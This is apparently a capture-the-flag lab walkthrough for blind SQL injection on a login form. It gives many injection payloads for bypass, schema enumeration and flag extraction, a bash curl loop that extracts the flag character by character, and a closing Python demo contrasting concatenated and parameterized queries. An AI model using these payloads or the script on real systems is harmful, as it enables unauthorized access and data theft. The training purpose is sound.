Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
SQL injection is one of the most critical web application vulnerabilities. This challenge demonstrates a blind SQL injection scenario where you don't see direct database output but can infer information through application behavior and response differences.
Go to <target-ip>:80 to view the login portal
Username: admin'
Password: anything
Username: admin' OR '1'='1' --
Password: anything
Username: admin' AND 1=(SELECT COUNT(*) FROM users) --
Password: anything
# This should return "Welcome admin!":
Username: admin' OR '1'='1' --
# This should return "Invalid username or password":
Username: admin' OR '1'='2' --
Username: admin' UNION SELECT 1,2,3 --
Username: admin' UNION SELECT 1,username,role FROM users --
Username: admin' UNION SELECT 1,sqlite_version(),3 --
# IMPORTANT: Don't use 'admin' for UNION queries since admin exists in DB!
# Use non-existent username for UNION-based enumeration:
Username: xyz' UNION SELECT 1,name,3 FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 0 --
Username: xyz' UNION SELECT 1,name,3 FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 1 --
# Boolean-based enumeration (works with any username):
Username: admin' AND (SELECT COUNT(*) FROM sqlite_master WHERE name='secrets')>0 --
Username: admin' AND (SELECT COUNT(*) FROM sqlite_master WHERE name='users')>0 --
Username: admin' UNION SELECT 1,sql,3 FROM sqlite_master WHERE name='secrets' --
# This will show the CREATE TABLE statement revealing column names
Username: admin' UNION SELECT 1,flag,3 FROM secrets --
# Extract flag length:
Username: admin' AND (SELECT LENGTH(flag) FROM secrets WHERE id=1)=36 --
# Extract first character:
Username: admin' AND (SELECT SUBSTR(flag,1,1) FROM secrets WHERE id=1)='a' --
# Extract second character:
Username: admin' AND (SELECT SUBSTR(flag,2,1) FROM secrets WHERE id=1)='b' --
# Continue this process for all 36 characters...
#!/bin/bash
flag=""
target="<target-ip>" # Replace with actual target IP/hostname
echo "Starting flag extraction..."
for i in {1..36}; do
    found=false
    # UUID format: only uses 0-9, a-f, and hyphens
    for char in {0..9} {a..f} -; do
        response=$(curl -s -X POST \
            -d "username=admin' AND (SELECT SUBSTR(flag,$i,1) FROM secrets WHERE id=1)='$char' --&password=test" \
            "http://$target/login")
        if [[ $response == *"Welcome"* ]]; then
            flag+="$char"
            echo "Found char $i: $char (Flag so far: $flag)"
            found=true
            break
        fi
    done
    if [[ $found == false ]]; then
        echo "Could not find character $i, stopping"
        break
    fi
done
echo "Final flag: $flag"
Username: admin' UNION SELECT 1,flag,role FROM secrets,users WHERE users.id=1 --
Username: admin' OR username=(SELECT flag FROM secrets WHERE id=1) --
# Use LIKE with wildcards to cause delays on large datasets
Username: admin' AND (SELECT flag FROM secrets WHERE id=1) LIKE '%a%' AND (SELECT COUNT(*) FROM sqlite_master,sqlite_master,sqlite_master) --
SELECT * FROM users WHERE username='$input' AND password='$password'
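The query above splices user input into the SQL text, which is what every payload in this walkthrough depends on. As an added example (not the lab's own code), the Python below runs four of the page's payloads against that concatenated form and against a parameterized form; the in-memory schema, the password and the all-zero flag are constructed assumptions.

```python
import sqlite3

INVALID = "Invalid username or password"

def make_db():
    # Constructed stand-in for the lab database; schema and values are assumed.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret-constructed', 'admin');
        INSERT INTO secrets VALUES (1, '00000000-0000-0000-0000-000000000000');
    """)
    return db

def login_vulnerable(db, username, password):
    # Same shape as the page's query: input becomes part of the SQL text.
    sql = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:  # e.g. the unbalanced quote from "admin'"
        return INVALID
    return f"Welcome {row[1]}!" if row else INVALID

def login_parameterized(db, username, password):
    # Placeholders bind input as data; quotes and "--" are never parsed as SQL.
    row = db.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return f"Welcome {row[1]}!" if row else INVALID

# Payloads copied from the walkthrough above.
PAYLOADS = [
    "admin' OR '1'='1' --",
    "admin' AND (SELECT COUNT(*) FROM sqlite_master WHERE name='secrets')>0 --",
    "admin' AND (SELECT LENGTH(flag) FROM secrets WHERE id=1)=36 --",
    "admin' AND (SELECT SUBSTR(flag,1,1) FROM secrets WHERE id=1)='a' --",
]

def compare(db):
    # (payload, response from concatenated query, response from bound query)
    return [(p, login_vulnerable(db, p, "anything"),
             login_parameterized(db, p, "anything")) for p in PAYLOADS]

if __name__ == "__main__":
    for payload, vuln, safe in compare(make_db()):
        print(f"{payload!r}\n  concatenated:  {vuln}\n  parameterized: {safe}")
```

With the concatenated query the response changes with the truth of the injected condition, which is the oracle the blind extraction relies on; with bound parameters every payload is just a username that does not exist.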